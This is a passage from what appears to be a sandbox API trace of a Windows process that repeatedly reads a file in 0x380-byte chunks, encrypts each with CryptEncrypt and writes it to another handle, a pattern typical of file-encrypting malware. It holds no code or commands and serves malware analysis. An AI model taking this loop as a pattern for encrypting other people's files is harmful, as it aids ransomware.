lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.416] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.416] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.416] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.417] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.417] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.417] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.417] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.417] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.417] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.418] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.418] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.418] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.418] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.418] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.418] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.418] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.418] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.418] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.418] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.418] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.418] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.418] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.419] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.419] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.419] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.419] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.419] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.419] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.419] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.419] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.419] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.419] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.419] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.419] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.420] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.420] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.420] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.420] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.420] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.420] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.420] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.420] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.420] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.420] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.420] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.420] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.421] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.421] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.421] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.421] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.421] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.421] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.421] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.421] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.421] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.422] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.422] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.422] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.422] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.422] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.422] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.422] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.422] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.422] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.423] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.423] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.423] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.423] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.423] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.424] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.424] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.424] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.424] CryptEncrypt (in: 